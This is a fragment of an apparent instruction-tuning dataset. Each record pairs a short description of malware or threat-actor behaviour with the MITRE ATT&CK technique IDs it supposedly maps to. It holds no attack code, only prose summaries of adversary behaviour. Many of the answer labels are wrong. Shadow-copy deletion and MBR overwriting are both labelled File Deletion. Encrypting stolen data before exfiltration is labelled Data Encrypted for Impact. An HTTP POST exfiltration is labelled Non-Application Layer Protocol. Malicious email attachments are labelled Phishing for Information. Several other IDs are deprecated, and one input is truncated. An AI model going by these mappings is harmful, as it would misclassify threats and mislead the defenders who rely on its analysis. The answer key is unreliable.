{ + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "communicates over ports 80, 443, 53, and 8080 via raw sockets instead of the protocols usually associated with the ports.", + "output": "- T1043: Commonly Used Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "communicates using HTTPS and uses a custom encryption cipher to encrypt the HTTPS message body.", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "compromised McAfee ePO to move laterally by distributing malware as a software deployment task.", + "output": "- T1072: Software Deployment Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "connects to a predefined domain on port 443 to exfil gathered information.", + "output": "- T1048: Exfiltration Over Alternative Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "connects to external C2 infrastructure over the HTTP port.", + "output": "- T1043: Commonly Used Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences, Windows vault credential objects, or using .", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "contains a collection of Privesc-PowerUp modules that can discover and exploit various path interception opportunities in services, processes, and variables.", + "output": "- T1034: Path Interception" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "contains a module to steal credentials from Web browsers on the victim machine.", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "contains the execFile function to execute a specified file on the system using the NSTask:launch method.", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "contains the getFirefoxPassword function to attempt to locate Firefox passwords.", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "contains the getInstalledAPP function to run ls -la /Applications to gather what applications are installed.", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "copies documents under 15MB found on the victim system to is the user's %temp%\\SMB\\ folder. It also copies files from USB devices to a predefined directory.", + "output": "- T1074: Data Staged" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "copies files from removable drives to C:\\system.", + "output": "- T1074: Data Staged" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "creates and uses a VBScript as part of its persistent execution.", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "creates a new service named \u201cntssrv\u201d to execute the payload.", + "output": "- T1543.003: Create or Modify System Process - Windows Service\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "creates a Registry subkey that registers a new service.", + "output": "- T1112: Modify Registry\n- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "creates Registry keys to allow itself to run as various services.", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "creates valid users to provide access to the system.", + "output": "- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "credential stealer ZUMKONG emails credentials from the victim using HTTP POST requests.", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "deletes shadow copies from the victim.", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "downloaded and launched code within a SCT file.", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "downloads and executes additional PowerShell code and Windows binaries.", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "dropper creates VBS scripts on the victim\u2019s machine.", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.", + "output": "- T1092: Communication Through Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "dumped the login data database from \\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "dumps usernames and passwords from Firefox, Internet Explorer, and Outlook.", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "employs the same encoding scheme as for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "encodes files before exfiltration.", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "encrypts collected data using a single byte XOR key.", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk.", + "output": "- T1547.008: Boot or Logon Autostart Execution - LSASS Driver" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "establishes persistence by creating a shortcut in the Windows startup folder to run a script each time the user logs in.", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "executes a batch script to store discovery information in %TEMP%\\info.dat and then uploads the temporarily file to the remote C2 server.", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "executes additional Jscript and VBScript code on the victim's machine.", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.", + "output": "- T1048: Exfiltration Over Alternative Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "exfiltrates screenshot files to its C2 server.", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "gathers information on local groups and members on the victim\u2019s machine.", + "output": "- T1087: Account Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "gathers user names from infected hosts.", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Get-ProcessTokenGroup Privesc-PowerUp module can enumerate all SIDs associated with its current token.", + "output": "- T1087: Account Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has access to destructive malware that is capable of overwriting a machine's Master Boot Record (MBR).", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has a command to retrieve information about connected users.", + "output": "- T1087: Account Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has a module to clear event logs with PowerShell.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has attached a malicious document to an email to gain initial access.", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has cleared logs during post compromise cleanup activities.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has compressed and encrypted data into password-protected RAR archives prior to exfiltration.", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has created a scheduled task named \u201cAdobeFlashSync\u201d to establish persistence.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server.", + "output": "- T1598.003: Phishing for Information - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has deployed backup web shells and obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network.", + "output": "- T1108: Redundant Access" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has disabled host-based firewalls. The group has also globally opened port 3389.", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has distributed targeted emails containing links to malicious documents with embedded macros.", + "output": "- T1598.003: Phishing for Information - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list 